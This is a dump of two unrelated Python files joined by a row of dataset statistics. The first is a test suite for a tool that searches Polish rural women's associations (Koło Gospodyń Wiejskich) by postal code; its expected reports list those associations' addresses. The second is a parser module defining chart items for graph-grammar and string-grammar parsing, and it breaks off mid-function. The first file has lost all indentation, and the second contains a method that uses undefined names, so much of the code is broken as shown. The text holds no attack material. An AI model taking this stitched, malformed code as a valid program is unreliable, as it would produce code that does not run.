def test_multiple_results_indirect_matches_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'24-100 TOMASZÓW' + '\n\n' + \
'Koło Gospodyń Wiejskich w Tomaszowie' + '\n' + \
'Tomaszów lok. 39' + '\n' + \
'24-100 Tomaszów' + '\n\n' + \
'Koło Gospodyń Wiejskich w Tomaszowie' + '\n' + \
'Tomaszów 44 "b"' + '\n' + \
'26-505 Tomaszów' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_indirect_matches_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_indirect_matches=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_duplicate_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Results found: 2'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_duplicate_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_duplicate_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Results found: 4'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_duplicate_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_duplicates=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_twice(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'33-393 MARCINKOWICE' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 124' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 104' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'Koło Gospodyń Wiejskich "Marcinkowicanki"' + '\n' + \
'Marcinkowice 47' + '\n' + \
'33-273 Marcinkowice' + '\n\n' + \
'Results found: 5'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_twice')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_on_multiple_pages_all_allowed(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'00-001 NOWA WIEŚ' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś Niemczańska' + '\n' + \
'Nowa Wieś Niemczańska 36 lok. 2' + '\n' + \
'58-230 Nowa Wieś Niemczańska' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowowianki w Nowej Wsi Legnickiej' + '\n' + \
'Nowa Wieś Legnicka 56' + '\n' + \
'59-241 Nowa Wieś Legnicka' + '\n\n' + \
'Koło Gospodyń Wiejskich POLANKI w Nowej Wsi Grodziskiej' + '\n' + \
'Nowa Wieś Grodziska 54' + '\n' + \
'59-524 Nowa Wieś Grodziska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi "Ale Babki"' + '\n' + \
'Nowa Wieś 63' + '\n' + \
'87-602 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 80' + '\n' + \
'88-324 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 76' + '\n' + \
'21-107 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 20C' + '\n' + \
'22-600 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 27' + '\n' + \
'99-300 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich ,,Futuryści" w Nowej Wsi' + '\n' + \
'Nowa Wieś 84' + '\n' + \
'97-340 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś "Koniczynka"' + '\n' + \
'Nowa Wieś 3' + '\n' + \
'97-330 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Szlachcianki' + '\n' + \
'Nowa Wieś Szlachecka 1b' + '\n' + \
'32-060 Nowa Wieś Szlachecka' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś' + '\n' + \
'Nowa Wieś 42' + '\n' + \
'32-046 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi (gmina Łabowa)' + '\n' + \
'Nowa Wieś 55' + '\n' + \
'33-336 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 25' + '\n' + \
'05-660 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Babeczki z pieprzem i solą' + '\n' + \
'Nowa Wieś 52' + '\n' + \
'26-900 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich "Nowalijki" w Nowej Wsi' + '\n' + \
'ul. Reymonta 32 A' + '\n' + \
'07-416 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Wschodniej' + '\n' + \
'Nowa Wieś Wschodnia 32A' + '\n' + \
'07-411 Nowa Wieś Wschodnia' + '\n\n' + \
'Koło Gospodyń Wiejskich KAROLEWO-NOWA WIEŚ' + '\n' + \
'Nowa Wieś 1' + '\n' + \
'09-505 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich "Stokrotka"' + '\n' + \
'Nowa Wieś 7B' + '\n' + \
'09-440 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Gospochy w Nowej Wsi' + '\n' + \
'ul. Magnolii 7' + '\n' + \
'05-806 Nowa Wieś' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W NOWEJ WSI' + '\n' + \
'ul. Wolności 37' + '\n' + \
'08-300 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś lok. 90' + '\n' + \
'36-100 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 152 A' + '\n' + \
'38-120 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich "Wespół w Zespół" w Nowej Wsi' + '\n' + \
'Nowa Wieś 18F' + '\n' + \
'16-402 Nowa Wieś' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH FIOŁKI W NOWEJ WSI' + '\n' + \
'Nowa Wieś 4' + '\n' + \
'77-320 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Przywidzkiej' + '\n' + \
'ul. Szkolna 2' + '\n' + \
'83-047 Nowa Wieś Przywidzka' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 41' + '\n' + \
'42-110 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich Nowa Wieś' + '\n' + \
'Nowa Wieś 100' + '\n' + \
'28-362 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 25' + '\n' + \
'27-640 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi „Nowalijki”' + '\n' + \
'Nowa Wieś 9A' + '\n' + \
'11-030 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Niechanowskiej "Storczyk"' + '\n' + \
'Nowa Wieś Niechanowska 14' + '\n' + \
'62-220 Nowa Wieś Niechanowska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Książęcej' + '\n' + \
'Nowa Wieś Książęca 35' + '\n' + \
'63-640 Nowa Wieś Książęca' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W NOWEJ WSI' + '\n' + \
'Nowa Wieś ' + '\n' + \
'63-708 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi' + '\n' + \
'Nowa Wieś 19 lok. B7' + '\n' + \
'63-308 Nowa Wieś' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Podgórnej' + '\n' + \
'Nowa Wieś Podgórna 21 lok. 2' + '\n' + \
'62-320 Nowa Wieś Podgórna' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Królewskiej' + '\n' + \
'Nowa Wieś Królewska 22' + '\n' + \
'62-300 Nowa Wieś Królewska' + '\n\n' + \
'Results found: 36'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_on_multiple_pages_all_allowed')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path, allow_indirect_matches=True, allow_duplicates=True)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_on_multiple_pages_indirect_matches_skipped(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'62-300 NOWA WIEŚ' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Niechanowskiej "Storczyk"' + '\n' + \
'Nowa Wieś Niechanowska 14' + '\n' + \
'62-220 Nowa Wieś Niechanowska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Podgórnej' + '\n' + \
'Nowa Wieś Podgórna 21 lok. 2' + '\n' + \
'62-320 Nowa Wieś Podgórna' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Królewskiej' + '\n' + \
'Nowa Wieś Królewska 22' + '\n' + \
'62-300 Nowa Wieś Królewska' + '\n\n' + \
'Results found: 3'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_on_multiple_pages_indirect_matches_skipped')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_multiple_results_with_empty_details(create_reports_dirs, remove_reports_dirs):
expected_report = \
'======================================================================' + '\n' + \
'89-200 TUR' + '\n\n' + \
'Koło Gospodyń Wiejskich Centrum Kultury Ostrowite' + '\n' + \
'ul. Szkolna 22' + '\n' + \
'89-620 Ostrowite' + '\n\n' + \
'Results found: 1'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='multiple_results_with_empty_details')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
def test_basic_use_cases(create_reports_dirs, remove_reports_dirs):
"""
no_result
single_result
multiple_results
no_result_twice
single_result_indirect_match_skipped
multiple_results_on_multiple_pages_indirect_matches_skipped
single_result_duplicate_skipped
multiple_results_twice
single_result_twice
"""
expected_report = \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'Koło Gospodyń Wiejskich "Zezulin" w Zezulinie' + '\n' + \
'Zezulin Pierwszy 22A' + '\n' + \
'21-075 Zezulin Pierwszy' + '\n\n' + \
'======================================================================' + '\n' + \
'38-315 KUNKOWA' + '\n\n' + \
'Koło Gospodyń Wiejskich i Gospodarzy w Kunkowej' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'Koło Gospodyń Wiejskich w Kunkowej i Leszczynach' + '\n' + \
'Kunkowa 18' + '\n' + \
'38-315 Kunkowa' + '\n\n' + \
'======================================================================' + '\n' + \
'33-383 MUSZYNKA' + '\n\n' + \
'======================================================================' + '\n' + \
'33-322 JASIENNA' + '\n\n' + \
'======================================================================' + '\n' + \
'33-334 BOGUSZA' + '\n\n' + \
'======================================================================' + '\n' + \
'62-300 NOWA WIEŚ' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Niechanowskiej "Storczyk"' + '\n' + \
'Nowa Wieś Niechanowska 14' + '\n' + \
'62-220 Nowa Wieś Niechanowska' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Podgórnej' + '\n' + \
'Nowa Wieś Podgórna 21 lok. 2' + '\n' + \
'62-320 Nowa Wieś Podgórna' + '\n\n' + \
'Koło Gospodyń Wiejskich w Nowej Wsi Królewskiej' + '\n' + \
'Nowa Wieś Królewska 22' + '\n' + \
'62-300 Nowa Wieś Królewska' + '\n\n' + \
'======================================================================' + '\n' + \
'21-075 ZEZULIN PIERWSZY' + '\n\n' + \
'======================================================================' + '\n' + \
'33-393 MARCINKOWICE' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 124' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH W MARCINKOWICACH' + '\n' + \
'Marcinkowice 104' + '\n' + \
'33-393 Marcinkowice' + '\n\n' + \
'Koło Gospodyń Wiejskich "Marcinkowicanki"' + '\n' + \
'Marcinkowice 47' + '\n' + \
'33-273 Marcinkowice' + '\n\n' + \
'======================================================================' + '\n' + \
'22-234 SĘKÓW' + '\n\n' + \
'KOŁO GOSPODYŃ WIEJSKICH "BUBNOWSKIE BABY"' + '\n' + \
'Sęków 15' + '\n' + \
'22-234 Sęków' + '\n\n' + \
'======================================================================' + '\n' + \
'21-421 ZASTAWIE' + '\n\n' + \
'Koło Gospodyń Wiejskich w Zastawiu' + '\n' + \
'Zastawie 47A' + '\n' + \
'21-421 Zastawie' + '\n\n' + \
'Results found: 11'
data_dir_path, report_dir_path = get_io_dir_paths(test_suite, test_case='basic_use_cases')
searcher = run_krkgw_searcher(data_dir_path, report_dir_path)
assert_report_file_content_equals(expected_report, searcher.report_file_path)
| 48.251462 | 145 | 0.531653 | 2,759 | 24,753 | 4.499094 | 0.093875 | 0.020624 | 0.036736 | 0.085717 | 0.873359 | 0.838315 | 0.828245 | 0.809555 | 0.795859 | 0.781036 | 0 | 0.038731 | 0.238557 | 24,753 | 512 | 146 | 48.345703 | 0.619801 | 0.009211 | 0 | 0.625 | 0 | 0 | 0.45365 | 0.136536 | 0 | 0 | 0 | 0 | 0.043182 | 1 | 0.047727 | false | 0 | 0.004545 | 0 | 0.052273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bb2f35d72860c941a4140869fd28c700aa0e181d | 19,950 | py | Python | parser/vo_item.py | gemoku/bolinas | dbdc2417d8ae82394f3f8e5e0758bad86b9cfd5a | [
"MIT"
] | 13 | 2015-12-05T16:30:48.000Z | 2021-04-15T14:38:24.000Z | parser/vo_item.py | karlmoritz/bolinas | 7a1a78bca0a6ba1cb9d80b13d2a87ce37993507f | [
"MIT"
] | 1 | 2015-10-18T03:50:53.000Z | 2015-10-18T03:58:28.000Z | parser/vo_item.py | karlmoritz/bolinas | 7a1a78bca0a6ba1cb9d80b13d2a87ce37993507f | [
"MIT"
] | 5 | 2015-10-18T03:10:07.000Z | 2018-06-29T17:40:43.000Z | from common.hgraph.hgraph import NonterminalLabel
from common import log
import itertools
# Some general advice for reading this file:
#
# Every rule specifies some fragment of the object (graph, string or both) that
# is being parsed, as well as a visit order on the individual elements of that
# fragment (tokens or edges respectively). The number of elements already
# visited is called the "size" of this item, and an item with nothing left to
# visit is "closed". The visit order specifies an implicit binarization of the
# rule in question, by allowing the item to consume only one other object (which
# we call the "outside" of the item) at any given time.
#
# In consuming this object, we either "shift" a terminal element or "complete" a
# nonterminal (actually a closed chart item). Each of these steps produces a new
# chart item.
class Item(object):
pass
class HergItem(Item):
"""
Chart item for a HRG parse.
"""
def __init__(self, rule, size=None, shifted=None, mapping=None, nodeset=None, nodelabels=False):
# by default start empty, with no part of the graph consumed
if size == None:
size = 0
if shifted == None:
shifted = frozenset()
if mapping == None:
mapping = dict()
if nodeset == None:
nodeset = frozenset()
self.rule = rule
self.size = size
self.shifted = shifted
self.mapping = mapping
self.nodeset = nodeset
self.rev_mapping = dict((val, key) for key, val in mapping.items())
self.nodelabels = nodelabels
# Store the nonterminal symbol and index of the previous complete
# on this item so we can rebuild the derivation easily
triples = rule.rhs1.triples(nodelabels = nodelabels)
self.outside_symbol = None
if size < len(triples):
# this item is not closed
self.outside_triple = triples[rule.rhs1_visit_order[size]]
self.outside_edge = self.outside_triple[1]
self.closed = False
self.outside_is_nonterminal = isinstance(self.outside_triple[1],
NonterminalLabel)
if self.outside_is_nonterminal:
# strip the index off of the nonterminal label
#self.outside_symbol = str(self.outside_triple[1])
#self.outside_symbol = self.outside_symbol[1:].split('[')[0]
self.outside_symbol = self.outside_triple[1].label
self.outside_nt_index = self.outside_triple[1].index
else:
# this item is closed
self.outside_triple = None
self.outside_edge = None
self.closed = True
self.outside_is_nonterminal = False
self.__cached_hash = None
def __hash__(self):
# memoize the hash function
if not self.__cached_hash:
self.__cached_hash = 2 * hash(self.rule) + 3 * self.size + \
5 * hash(self.shifted)
return self.__cached_hash
def __eq__(self, other):
return isinstance(other, HergItem) and \
other.rule == self.rule and \
other.size == self.size and \
other.shifted == self.shifted and \
other.mapping == self.mapping
def uniq_str(self):
"""
Produces a unique string representation of this item. When representing
charts in other formats (e.g. when writing a tiburon RTG file) we have to
represent this item as a string, which we build from the rule id and list of
nodes.
"""
return 'R%d__%s' % (self.rule.rule_id, self.uniq_cover_str())
def uniq_cover_str(self):
edges = set()
for head, elabel, tail in self.shifted:
if tail:
edges.add('%s:%s' % (head[0], ':'.join([x[0] for x in tail])))
else:
edges.add(head[0])
return ','.join(sorted(list(edges)))
def __repr__(self):
return 'HergItem(%d, %d, %s, %s)' % (self.rule.rule_id, self.size, self.rule.symbol, len(self.shifted))
def __str__(self):
return '[%d, %d/%d, %s, {%s}]' % (self.rule.rule_id,
self.size,
len(self.rule.rhs1.triples()),
self.outside_symbol,
str([x for x in self.shifted]))
def can_shift(self, new_edge):
"""
Determines whether new_edge matches the outside of this item, and can be
shifted.
"""
#print "SHIFT", self, "<---", new_edge
# can't shift into a closed item
if self.closed:
return False
# can't shift an edge that is already inside this item
if new_edge in self.shifted:
return False
olabel = self.outside_triple[1]
nlabel = new_edge[1]
# make sure new_edge mathes the outside label
if olabel != nlabel:
return False
# make sure new_edge preserves a consistent mapping between the nodes of the
# graph and the nodes of the rule
if self.nodelabels:
#print o1
o1, o1_label = self.outside_triple[0]
n1, n1_label = new_edge[0]
if o1_label != n1_label:
return False
else:
o1 = self.outside_triple[0]
n1 = new_edge[0]
if o1 in self.mapping and self.mapping[o1] != n1:
return False
# if this node is not a node of this rule RHS, but of a subgraph it needs to have a mapping.
# otherwise, we can't attach.
if n1 in self.nodeset and n1 not in self.rev_mapping:
return False
if self.nodelabels:
if self.outside_triple[2]:
o2, o2_labels = zip(*self.outside_triple[2])
else: o2, o2_labels = [],[]
if new_edge[2]:
n2, n2_labels = zip(*new_edge[2])
else: n2, n2_labels = [],[]
if o2_labels != n2_labels:
return False
else:
o2 = self.outside_triple[2]
n2 = new_edge[2]
if len(o2) != len(n2):
return False
for i in range(len(o2)):
if o2[i] in self.mapping and self.mapping[o2[i]] != n2[i]:
return False
# Again, need to make sure this node is part of the rule RHS, not of a
# proper subgraph.
if n2[i] in self.nodeset and n2[i] not in self.rev_mapping:
return False
return True
def shift(self, new_edge):
"""
Creates the chart item resulting from a shift of new_edge. Assumes
can_shift returned true.
"""
olabel = self.outside_triple[1]
o1 = self.outside_triple[0][0] if self.nodelabels else self.outside_triple[0]
o2 = tuple(x[0] for x in self.outside_triple[2]) if self.nodelabels else self.outside_triple[2]
nlabel = new_edge[1]
n1 = new_edge[0][0] if self.nodelabels else new_edge[0]
n2 = tuple(x[0] for x in new_edge[2]) if self.nodelabels else new_edge[2]
new_nodeset = self.nodeset | set(n2) | set([n1])
assert len(o2) == len(n2)
new_size = self.size + 1
new_shifted = frozenset(self.shifted | set([new_edge]))
new_mapping = dict(self.mapping)
new_mapping[o1] = n1
for i in range(len(o2)):
new_mapping[o2[i]] = n2[i]
return HergItem(self.rule, new_size, new_shifted, new_mapping, new_nodeset, self.nodelabels)
def can_complete(self, new_item):
"""
Determines whether new_item matches the outside of this item (i.e. if the
nonterminals match and the node mappings agree).
"""
# can't add to a closed item
if self.closed:
#log.debug('fail bc closed')
return False
# can't shift an incomplete item
if not new_item.closed:
#log.debug('fail bc other not closed')
return False
# make sure labels agree
if not self.outside_is_nonterminal:
#log.debug('fail bc outside terminal')
return False
#Make sure items are disjoint
if any(edge in self.shifted for edge in new_item.shifted):
#log.debug('fail bc overlap')
return False
# make sure mappings agree
if self.nodelabels:
o1, o1label = self.outside_triple[0]
if self.outside_triple[2]:
o2, o2labels = zip(*self.outside_triple[2])
else:
o2, o2labels = [],[]
else:
o1 = self.outside_triple[0]
o2 = self.outside_triple[2]
if len(o2) != len(new_item.rule.rhs1.external_nodes):
#log.debug('fail bc hyperedge type mismatch')
return False
nroot = list(new_item.rule.rhs1.roots)[0]
#Check root label
if self.nodelabels and o1label != new_item.rule.rhs1.node_to_concepts[nroot]:
return False
if o1 in self.mapping and self.mapping[o1] != new_item.mapping[nroot]:
# new_item.mapping[new_item.rule.rhs1.roots[0]]:
#log.debug('fail bc mismapping')
return False
real_nroot = new_item.mapping[nroot]
real_ntail = None
for i in range(len(o2)):
otail = o2[i]
ntail = new_item.rule.rhs1.rev_external_nodes[i]
#Check tail label
if self.nodelabels and o2labels[i] != new_item.rule.rhs1.node_to_concepts[ntail]:
return False
if otail in self.mapping and self.mapping[otail] != new_item.mapping[ntail]:
#log.debug('fail bc bad mapping in tail')
return False
for node in new_item.mapping.values():
if node in self.rev_mapping:
onode = self.rev_mapping[node]
if not (onode == o1 or onode in o2):
return False
return True
def complete(self, new_item):
"""
Creates the chart item resulting from a complete of new_item. Assumes
can_shift returned true.
"""
olabel = self.outside_triple[1]
o1 = self.outside_triple[0][0] if self.nodelabels else self.outside_triple[0]
o2 = tuple(x[0] for x in self.outside_triple[2]) if self.nodelabels else self.outside_triple[2]
new_size = self.size + 1
new_shifted = frozenset(self.shifted | new_item.shifted)
new_mapping = dict(self.mapping)
new_mapping[o1] = new_item.mapping[list(new_item.rule.rhs1.roots)[0]]
for i in range(len(o2)):
otail = o2[i]
ntail = new_item.rule.rhs1.rev_external_nodes[i]
new_mapping[otail] = new_item.mapping[ntail]
new_nodeset = self.nodeset | new_item.nodeset
new = HergItem(self.rule, new_size, new_shifted, new_mapping, new_nodeset, self.nodelabels)
return new
class CfgItem(Item):
"""
Chart item for a CFG parse.
"""
def __init__(self, rule, size=None, i=None, j=None, nodelabels = False):
# until this item is associated with some span in the sentence, let i and j
# (the left and right boundaries) be -1
if size == None:
size = 0
if i == None:
i = -1
if j == None:
j = -1
self.rule = rule
self.i = i
self.j = j
self.size = size
self.shifted = []
assert len(rule.rhs1) != 0
if size == 0:
assert i == -1
assert j == -1
self.closed = False
self.outside_word = rule.rhs1[rule.rhs1_visit_order[0]]
elif size < len(rule.string):
self.closed = False
self.outside_word = rule.string[rule.rhs1_visit_order[self.size]]
else:
self.closed = True
self.outside_word = None
if self.outside_word and isinstance(self.outside_word, NonterminalLabel):
self.outside_is_nonterminal = True
self.outside_symbol = self.outside_word.label
self.outside_nt_index = self.outside_word.index
else:
self.outside_is_nonterminal = False
self.__cached_hash = None
def __hash__(self):
if not self.__cached_hash:
self.__cached_hash = 2 * hash(self.rule) + 3 * self.i + 5 * self.j
return self.__cached_hash
def __eq__(self, other):
return isinstance(other, CfgItem) and \
other.rule == self.rule and \
other.i == self.i and \
other.j == self.j and \
other.size == self.size
def __repr__(self):
return 'CfgItem(%d, %d, %s, (%d, %d))' % (self.rule.rule_id, self.size, str(self.closed), self.i, self.j)
def __str__(self):
return '[%s, %d/%d, (%d,%d)]' % (self.rule,
self.size,
len(self.rule.rhs1),
self.i,self.j)
def uniq_str(self):
"""
Produces a unique string representation of this item (see note on uniq_str
in HergItem above).
"""
return '%d__%d_%d' % (self.rule.rule_id, self.i, self.j)
def can_shift(self, word, index):
"""
Determines whether word matches the outside of this item (i.e. is adjacent
and has the right symbol) and can be shifted.
"""
if self.closed:
return False
if self.i == -1:
return True
if index == self.i - 1:
return self.outside_word == word
elif index == self.j:
return self.outside_word == word
return False
def shift(self, word, index):
"""
Creates the chart item resulting from a shift of the word at the given
index.
"""
if self.i == -1:
return CfgItem(self.rule, self.size+1, index, index+1)
elif index == self.i - 1:
return CfgItem(self.rule, self.size+1, self.i-1, self.j)
elif index == self.j:
return CfgItem(self.rule, self.size+1, self.i, self.j+1)
assert False
def can_complete(self, new_item):
"""
Determines whether new_item matches the outside of this item.
"""
if self.closed:
return False
if not new_item.closed:
return False
if self.outside_symbol != new_item.rule.symbol:
return False
return self.i == -1 or new_item.i == self.j #or new_item.j == self.i
def complete(self, new_item):
"""
Creates the chart item resulting from a completion with the given item.
"""
if self.i == -1:
return CfgItem(self.rule, self.size+1, new_item.i, new_item.j)
elif new_item.i == self.j:
return CfgItem(self.rule, self.size+1, self.i, new_item.j)
elif new_item.j == self.i:
return CfgItem(self.rule, self.size+1, new_item.i, self.j)
assert False
class SynchronousItem(Item):
"""
Chart item for a synchronous CFG/HRG parse. (Just a wrapper for paired
CfgItem / HergItem.)
"""
def __init__(self, rule, item1class, item2class, item1 = None, item2 = None, nodelabels = False):
self.shifted = ([],[])
self.rule = rule
self.nodelabels = nodelabels
self.item1class = item1class
self.item2class = item2class
if item1:
self.item1 = item1
else:
self.item1 = item1class(rule.project_left(), nodelabels = nodelabels)
if item2:
self.item2 = item2
else:
self.item2 = item2class(rule.project_right(), nodelabels = nodelabels)
if self.item1.closed and self.item2.closed:
self.closed = True
else:
self.closed = False
# Now we potentially have two outsides---one in the graph and the other in
# the string. The visit order will guarantee that if we first consume all
# terminals in any order, the remainder of both string and graph visit
# orders will agree on the sequence in which to consume nonterminals. (See
# the Rule class.) Before consuming all terminals, it might be the case that
# one item has a terminal outside and the other a nonterminal; in that case
# we do not want an outside nonterminal associated with this item.
if item1class is CfgItem:
self.outside1_is_nonterminal = self.item1.outside_is_nonterminal
self.outside_object1 = self.item1.outside_word
else:
self.outside1_is_nonterminal = self.item1.outside_is_nonterminal
self.outside_object1= self.item1.outside_triple[1] if \
self.item1.outside_triple else None
if item2class is CfgItem:
self.outside2_is_nonterminal = self.item2.outside_is_nonterminal
self.outside_object2 = self.item2.outside_word
else:
self.outside2_is_nonterminal = self.item2.outside_is_nonterminal
self.outside_object2 = self.item2.outside_triple[1] if \
self.item2.outside_triple else None
self.outside_is_nonterminal = self.outside1_is_nonterminal and \
self.outside2_is_nonterminal
if self.outside_is_nonterminal:
assert self.outside_object1 == self.outside_object2
self.outside_symbol = self.item1.outside_symbol
self.outside_nt_index = self.item1.outside_nt_index
self.__cached_hash = None
def uniq_str(self):
"""
Produces a unique string representation of this item (see note on uniq_str
in HergItem above).
"""
edges = set()
if item1class is CfgItem:
item1cover = "%d,%d" % (self.item1.i, self.item1.j)
elif item1class is HergItem:
item1cover = item1.uniq_cover_str(self)
if item2class is CfgItem:
item2cover = "%d,%d" % (self.item2.i, self.item2.j)
elif item2class is HergItem:
item2cover = item2.uniq_cover_str(self)
return '%d__%s__%s' % (self.rule.rule_id, item1cover, item2cover)
def __hash__(self):
if not self.__cached_hash:
self.__cached_hash = 2 * hash(self.item1) + 7 * hash(self.item2)
return self.__cached_hash
def __eq__(self, other):
return isinstance(other, SynchronousItem) and other.item1 == self.item1 \
and other.item2 == self.item2
def __repr__(self):
return "(%s, %s, %s, %s)" % (self.item1.__repr__(), self.item2.__repr__(), str(self.item1.closed),str(self.item2.closed))
def can_shift_word1(self, word, index):
"""
Determines whether given word, index can be shifted onto the CFG item.
"""
assert isinstance(self.item1, CfgItem)
return self.item1.can_shift(word, index)
def can_shift_word2(self, word, index):
"""
Determines whether given word, index can be shifted onto the CFG item.
"""
